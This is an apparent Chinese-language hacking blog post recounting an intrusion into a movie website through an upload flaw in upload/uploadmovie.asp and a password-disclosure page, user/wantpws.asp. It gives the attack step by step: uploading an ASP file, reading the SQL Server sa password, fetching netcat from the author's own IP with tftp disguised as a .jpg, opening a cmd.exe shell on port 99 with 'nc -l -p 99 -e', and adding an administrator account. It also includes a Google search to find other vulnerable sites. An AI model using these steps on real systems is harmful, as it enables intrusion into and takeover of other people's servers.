这个漏洞使用很简单,危害极大,轻易可以得到治理员帐户。假如系统配置不当,在upload/uploadmovie.asp答应上传ASP文件,系统就很轻易换主人了。我曾经成功渗透过这样一个网站,简单过程叙述如下。
上传一个ASP程序,发现该系统运行SQLSERVER,通过读源文件看到了sa的密码,用sqlexec连接,tftp上传nc.exe。再次dir发现nc被删了,有防火强。用tftp上传nc.jpg肯定万无一失, tftp -i 我的IP get nc.exe nc.jpg,上传成功。在sqlexec运行
| nc.jpg -l -p 99 -e c\winnt\system32\cmd.exe |
nc想必都很熟悉了吧,上面就是再目标机器上开一个99端口监听,同时把cmd.exe重定向到这里,本地连接nc.exe -vv 目标IP 99,得到shell,而且是治理员权限。输入 net user abc 123456 /add && net localgroup administrators abc /add添加用户成功顺便加入治理员,&&意思是前面成功后面执行。该系统开着3389,省了我好多事情。好了回到正题,这个漏洞存在80%以上电影程序中,在google里搜索user/wantpws.asp,打开后发现可以输入三个参数,且把密码直接显示的都有此漏洞。修补方法,应该对三个参数进行严格验证,而且把结果发送的到邮箱里更稳妥,有的网站是这样做的。
总结:
我写此问的目的是想说好多问题要多想多试,一个漏洞利用方法不只一种,我们要自己学会发现。入侵过程灵活多样,我们应动脑筋。大家免费看电影的同时可别搞破坏啊,任何后果与我无关。同时我也希望看到这篇文章后,网站尽快更改。
评论加载中…
 |